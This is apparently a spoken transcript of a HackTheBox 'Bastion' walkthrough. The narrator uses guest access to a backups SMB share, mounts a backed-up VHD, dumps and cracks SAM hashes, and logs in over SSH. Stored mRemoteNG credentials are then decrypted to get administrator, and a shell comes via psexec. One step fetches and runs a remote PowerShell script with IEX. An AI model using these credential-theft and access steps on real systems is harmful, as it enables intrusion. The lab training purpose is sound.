What's going on YouTube? This is PSEXEC and we're doing Bastion from HackTheBox, which is set up like a Bastion host. Some people call them jump boxes. Essentially the idea is you create one super secure box that's absolutely hacker-proof for all your users to remote into in order to access things on the other side. So let's say I'm at home and I want to access things on the corporate network. Instead of leaving my corporate Windows workstation exposed to the internet, I'd just leave a Bastion host exposed, and then from home, I can SSH into the Bastion host, which is dual homed, and I can then create a port forward to access my workstation. That's essentially the idea. The main drawback is a Bastion host, by definition, is one host. So if that host ever gets compromised, all the credentials that access it also get compromised, which often is domain admins, and they normally can get into a lot of things. That technology has kind of been replaced by the web browser because you can do almost anything in the web browser, especially with no VNC, Guacamole, etc. You can just create virtual environments that contain users to specific places and don't give them a whole environment so you're not sharing credentials. If you don't want to do that, you got things like virtual application streaming, so you can just stream them the app they need. And then if you want to go even more, you can do like a remote desktop gateway. So when they remote desktop in, they get their own environment. So again, if that environment ever gets compromised, compromise is just their credentials. It's not sharing a host for everyone. So with all that being said, let's go exploit a Bastion host. As always, we begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Bastion. And then the IP address, which is 10.10.10.134. Can take some time to run, so I've already ran it. Looking at the results, we have a few ports open. The first thing is SSH on port 22, and that's running OpenSSH for Windows. SSH on Windows is a bit unique, but hey, it's there, so definitely take note of it. Then we have remote procedural call on ports 135 and 139, nothing too interesting there. Then this Microsoft-DS, which is SMB, on port 445. And interesting enough, there's no web servers. So I believe the biggest attack surface right now is SMB. So that's where we're going to begin. SSH generally has authentication, and I've never seen like guest access to SSH or anonymous access, but I have seen anonymous access to SMB. So let's go and try that out. First thing I'm going to do is SMBClient. -L to list shares, then //10.10.10.134. And then for the password, I'm just going to hit enter and it will list the shares. The admin C and IPC are all defaults. Backups is a unique share. So I'm going to mount backups with mount-t CIFS, which is the like Windows protocol for mounting. I think SMBFS may work as well. I honestly don't know the difference between CIFS and SMBFS, but back to the point, put the mount point, which is 10.10.10.134/backups, and then where do you want to mount it to? So I'm going to make the directory /mnt/SMB, and then we'll mount it there. And then password, just hit nothing for a guest authentication. And if we do ls/mount SMB, we see files. There's also SMBMap, which we could use if you didn't want to use SMBClient. So that would be SMBMap -H 10.10.10.134. And the first thing it does, I believe, is like anonymous access, which we get denied. If you specify any username, it doesn't matter which one. It will try guest access and we can see files. The interesting thing to note, though, is I believe it attempted to write this directory. So let's do ls/mount/SMB, and we see that directory exists because it says the permissions are read-write, so it tests a write, but it doesn't have permission to delete. So always keep in mind what your tools do, and if you're a defender, also know what tools do because you can create IOCs for indicators of compromise. But if we try to remove this, we get access denied, and we can verify that it does indeed create a random file by just running that same command again. And if we do ls/la mount SMB, we'll see the second file it attempted to create. So if I was creating some type of IOC for this, I just like monitor share drives in the root directory for things that are, let's see, probably 10 characters long. So that could help detect SMBMap usage on your network, but that's also a reason why sometimes I prefer just using like the dumb tools like SMBClient instead of automated things, because typically those don't make mistakes like that. And that may not be a mistake, but always know what your tools do. So let's just get back on topic and go through this. We have note.txt. So I'm going to see what that file is. If we cat it out, it says sysadmins, please don't transfer the entire backup locally. We're on a VPN and our Office is just too slow for that. So if we do like a du-hs to see the size, and then let's just go into that directory. Oh, it's 5.1 gigs. So they don't want you copying 5 gigs over the network. That's fair. So let's just go through this. We got the machine name L4MPJE-PC. If we go to our nmap scans, that will probably say it here. NetBIOS computer name is Bastion. So a little bit different. We got a backup of this PC, but the computer name and nmap at least is Bastion. So let's keep going through this. We do have a backup. So let's check this out. LSLA. And there are a few files. So right here, the interesting files are probably going to be VHD, virtual hard drive. And there's 2 options we could do. We can do like 7ZL to list files, and 7-zip has the ability to go and view the files of a VHD file. So we can see this, and we can see all the paths. Given that it's only got system boot, that is probably the boot partition that's backed up. So let's go to the next one down, and this will be FBC4. This one is FBC3. So it's just a GUID, but let's try the other partition. And this one is probably much bigger. If we do du-hs stir, this one is the 5 gig partition. You can do 7-zip here as well, and then you could do like 7z space x to extract it. But typically it's just a pain working with 7-zip, and this can be a little bit slow. So I'm going to pause the video. We'll let this view all the files, and then we're just going to mount the VHD. 7-zip has finished, and we can look at all the files it shows, and it shows us pretty much a Windows install, but there's just so many files to go through and search, it's a pain. So let's mount this. To mount a VHD on Linux, use guestmount, and I don't have that installed. So I'm going to do apt install libguestfs-tools and install this. While that installs, there is one thing I missed that I probably would do if I was on an engagement. If we did SMBMap-U does not exist, and then -H 10.10.10 134. If I saw this read-write on like backups or pretty much read-write anywhere, I'd probably create a .scf file. And if you're unfamiliar with that, we showed it in Sizzle. Essentially, it's a method to do steal hashes. So when a user views a directory that has that SCF file, if that SCF file is specifically created, you can force them to try to connect back to your machine. And when they do so, they may perform an authentication. If they perform an authentication, you can get the hash and crack it. So being on the backups directory in particular is super useful because the people who view backups are probably admins. So if you put an SCF file there and an admin goes, you may get an admin hash. So definitely check out the Sizzle video for that. It's not going to work on this box because there's no automated process looking at that directory. But I was hoping the tool would finish by the time I explained that. It didn't, so I'm going to pause the video again and we'll just resume when this is done. Once libguestfs-tools is done, we can mount the drive. So we'll do guest mount and then --add, specify the VHD file, do --inspector, --read only, and you could do -v for verbose just to make sure it's doing something. Oh, we have to specify a directory. So let's do make dir mount VHD, and we'll mount it there. So it's going to take probably a minute to 2 minutes to mount, and just spew a bunch of stuff to the screen. So we'll just let that mount and resume the video when this is done. When the command finishes, you'll be back at a command prompt. So now we can go into /mount VHD where we mounted it, and doing ls here shows we're at the C drive. So the very first thing I'm going to do is go into the users, do an ls, and we got the L4MPJE user. And we can look at what files are here. So we can do like find, desktop, documents, downloads, and then do like -ls to list all the files. And we see really nothing too interesting. So one thing we could try to do is extract maybe the administrator password to this guy. So if we go into Windows, then System32, and then config, we have a few files. The important ones are, I believe, SAM and System, and these are the registry hives, if like HKey, local machine, whatnot. I think the user database is in the SAM, but the boot key, which the user database is encrypted, is in the system. So that's why you need that one. And if you're on a domain controller, you'd also want to grab like ntds.dit. And if you have all three files, ntds, SAM, and system, you can extract the Active Directory database. But for now, we're just on the box, so we'll do that. Root, HTTP, boxes, and then Bastion. So let's go into that directory, and we can make a directory backup dump and move those files there. Go in here, and we can do, I think it's secretsdump or impacket-secretsdump-sam, the file name, system, the file name, and then local. And here we go. We have a few hashes. The first thing I notice is the administrator hash is blank. 31D6 means nothing. Same with AAD3B as a LM hash. LM isn't used anymore, so that's why you see it always blanked out. But this being blanked out means administrator account is probably disabled. So we do have a hash for a user, and we can check if he has write access over the C vol or C $. If he does, then we can probably use PSEXEC and get administrator. If he doesn't, then we'll have to find another way. So I'm doing -H to test as a hash login, and this does pass the hash. So we'll paste the whole hash in, and then -H is the host name 10.10.10.134. Maybe it's just -P, and then it uses some regular expression. There we go, hash detected. So we see we authenticated, but the admin has no access, C has no access, backup still has the same. So we didn't get anything. There was that SSH login, so let's try to decrypt this hash and see if we can log in via SSH. So I'm just going to go to hashes.org. We can do hash search, and then search hashes.org for this. So KI2D9U0. And we see the password is something. So v.creds L4MPJE, I think, is the username. What did I use here? L4MPJE. Yep. So we got a password. So let's try SSH L4MPJE at 10.10.10.134 to see if they allow SSH to log in. Yes. Cat creds. Copy this. Paste. And there we go. We're now on the box. So the first thing I'm going to do is net local group administrators. And we see the members of the administrators group is administrator, which is odd because it looked like this account was disabled. So we can do net local group, or not net local group, net user L4MPJE to see what groups we're a member of. I believe it says, there we go, local group membership users. So let's check net user administrator. And we can see he has logged on. He does have a password last set date of April 16th. So what I'm going to do is go back into the VHD, and we're going to see the dates of those files. So LSLA, and we can see grep SAM. The SAM was last modified February 22nd, and the system was modified February 22nd as well. The password was updated in April. So this is an old backup, and that's why the administrator account was blanked out. But now it definitely looks like there is one. So we have to figure out how to privesc. So the first thing I'm going to do is run a tool called JAWS, just another Windows enumeration script. That's on PowerShell, so we'll GitHub to find it and install it. I had installed Kali again, so I don't have all my tools. Looking at opt, you can see it's rather bare. So go into JAWS. We can do Python M, simple HTTP server, and then look at our IP address, which is probably 10.10.14.3. It is. So we can do PowerShell, and then IEX, new object, net.web client, download string, HTTP 10.10.14.3, port 8000, JAWS enum.ps1. I think that's the name of the script. There we go. Now it's running. While that runs, let's just see if we can get another session into this box, because it can take a while. And you should always be doing recon in the background and working while you do recon. It's getting a lot of permission denieds, but we don't care about that right now. We are enumerating the box. So going to go into the root of C. Actually, let's just check users. We got the administrator user and L4MPJE. We didn't have a flag, I think, in the desktop of the background, of the, not background, backup. So let's check if we have a flag here. So L4MPJE, CD desktop, dir. You got user.txt there. It says it's 32 bytes, so chances are that is the flag. Let's look at what is in documents. Nothing. You can check other directories. I don't think you'll find anything. So let's go to the root of C and see what's here. We got backups. If we look in backups, this is the share, so nothing too interesting there. You got logs, looking in quite a few event logs and things, but I'm going to ignore these because look at the date. September 12th, 2016. Wasn't it like February something and recent? So chances are these logs are old, so I could care less about them. Because we know the administrator changed his password after then. At least I think it was 2018. Let's check. Net users, administrator. Yeah, password last set 2019. So looking at file dates is generally a good thing to do. So I'm going to go into program files, do a dir and see what's here. We have the OpenSSH directory, PowerShell, nothing too interesting. We can check program files, x86, dir, and there's an application that looks unique, mRemoteNG. And this is just a, like, I think it's, imagine a tool that manages a bunch of putties. It's just a remote desktop management tool or something. I've used it before a long time ago, don't exactly remember. But going on the theme of Bastion, it's a remote management tool, and generally people use Bastion host as a jump box and you load remote management tools on it so they can access other equipment. Bastion doesn't really serve any purpose other than getting into other places. So let's go and Google mRemoteNG extract password. So we got this view mRemote passwords, mRemote password recover. So let's see. Is there anything here? Recover easy. I don't want to download something off some guy's Dropbox account. So let's do, instead of extract password, decrypt password. And going down, we get a blog post that says mRemoteNG password is insecure, and then links to this post. And if we go over it, we can see there is a specific version of something where it's saying you can reverse the encryption. This blog post does something different. It installs mRemoteNG, and here you go. You can see the connection. This is saying remote desktop, so it's going to open up remote desktop and probably put the password on your clipboard so you can paste it in. So what they did is they say, hey, instead of opening remote desktop, which is MSTSC, open up CMD and then echo me the password variable, which is what it would put in your clipboard or paste in or whatnot. We're going to do this box a little bit differently because I don't want to load up Windows. We're going to do a offline decoder. So I'm just going to search GitHub mRemoteNG-Decrypt. And we'll go to the first one and use this guy's Python script. So let's go back to this pane. We can stop hosting JAWS, I guess, and do git clone mRemoteNG-Decrypt. And yes, I know the irony of not wanting to download a Dropbox thing and then immediately git cloning something from GitHub and just executing it without reading the source. Irony is not lost on me there. But we can look at this, and it needs the string of the password. So that's what we have to find. We have to find the string of the password, and if you read the blog post, it's in the config file. So generally in Windows, config files for users are stored in app data, which is in the user directory. So cd/users l4mpje. I think dir/a will list all files included and hidden. So that's where you can see app data. If you don't have the /a, you don't see it. But we go into app data, and then normally it's in roaming. And we can go mRemoteNG dir. And here we go. We got a bunch of configs with some backups. So I'm just going to do type to cat the file. There's the XML. I'm going to search for password. So username l4mpje. Here's this password, and let's try decrypting it. So we'll do Python 3 mRemoteNG string, paste this. This credential looks similar. We already had that. So let's go see if there's another one. Let's just, my bad, search for password, hit N to do next, and just keep going up until we see something interesting. And right here, I see a different base64 string. This username is administrator. So let's copy this and do the same exact thing. So Python 3 -s paste, and we get a different password. So I'm going to do SMBMap -u administrator -p for password -h for host 10.10.10.134, and we see now we can read and write to admin or $. So we should be able to do like mpacket -PSEXEC. Do I not have that? Mpacket. I guess I don't have it installed. Locate psexec.py. User share. Is it here? Not in my path. User share doc python -mpacket. We could also just SSH in, but I wanted to use mpacket. So psexec.py. Okay. Administrator at 10.10.10.134. Paste the password. Requesting the shares, uploading the file, And as long as antivirus or something doesn't stop this, we should get a shell. While that goes, we can just SSH administrator at 10.10.10.134. And now we're rushing to who gets the shell first, PSEXEC or my SSH session. Come on. Did the host go down? Ping 10.10.10.134. Nope, just going slow. Paste it in. Can only imagine what would be like downloading that 5 GB file. Come on. Eventually something will let me in. Either that PSEXEC or this SSH. There we go. So, who am I? Administrator at Bastion. Desktop. dir root.txt. And then we can also cd users, administrator, desktop, and we see root.txt. It should be important to note that when we do PSEXEC, we're running as system. When we do SSH, we're running as the administrator user. Just something to keep note of. If you use the, I think, Windows version of PSEXEC, you can remain as the user. I don't think there's a flag in mPackets to not impersonate, or not impersonate the user. So let's see. Maybe there's a help. If there is, we can see if there's not impersonate. Don't see it, so yep. But that'll be the video. Hope you guys enjoyed it. Take care, and I will see you all next week.